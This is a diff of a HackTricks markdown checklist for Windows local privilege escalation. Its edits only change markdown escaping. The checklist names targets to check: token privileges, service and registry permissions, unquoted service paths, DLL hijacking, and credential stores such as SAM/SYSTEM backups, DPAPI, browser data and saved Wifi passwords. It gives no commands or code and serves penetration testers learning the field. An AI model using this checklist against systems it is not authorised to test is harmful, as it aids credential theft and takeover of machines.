* [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)**** * [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)\*\*\*\*
* [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)? * [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?&#x20; * [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
* [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)? * [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
* [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?) * [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
* [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)**** * [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)\*\*\*\*
* [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)? * [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
### [Network](windows-local-privilege-escalation/#network) ### [Network](windows-local-privilege-escalation/#network)
* [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)**** * [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)\*\*\*\*
* [ ] Check **hidden local services** restricted to the outside * [ ] Check **hidden local services** restricted to the outside
### [Running Processes](windows-local-privilege-escalation/#running-processes) ### [Running Processes](windows-local-privilege-escalation/#running-processes)
* [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)**** * [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)\*\*\*\*
* [ ] ****[**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)**** * [ ] [**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)
* [ ] ****[**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)**** * [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)
### [Services](windows-local-privilege-escalation/#services) ### [Services](windows-local-privilege-escalation/#services)
@ -63,11 +63,11 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions) * [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
* [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths) * [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
### ****[**Applications**](windows-local-privilege-escalation/#applications)**** ### [**Applications**](windows-local-privilege-escalation/#applications)
* [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)**** * [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)\*\*\*\*
* [ ] ****[**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)**** * [ ] [**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)**** * [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)\*\*\*\*
### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking) ### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
@ -82,7 +82,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials) ### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
* [ ] ****[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials * [ ] \*\*\*\*[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use? * [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)? * [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
* [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)? * [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
@ -94,21 +94,21 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials) ### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
* [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)**** * [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)\*\*\*\*
* [ ] ****[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)? * [ ] \*\*\*\*[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
* [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)? * [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
* [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup? * [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
* [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)? * [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
* [ ] ****[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file? * [ ] \*\*\*\*[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file?
* [ ] ****[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)? * [ ] \*\*\*\*[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)?
* [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)? * [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)?
* [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)? * [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)?
* [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user? * [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user?
* [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)? * [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
* [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)? * [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)?
* [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)? * [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)?
* [ ] ****[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry * [ ] \*\*\*\*[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry
* [ ] ****[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords * [ ] \*\*\*\*[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords
### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers) ### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers)
@ -120,12 +120,10 @@ If you want to **share some tricks with the community** you can also submit **pu
### And more... ### And more...
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (4).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*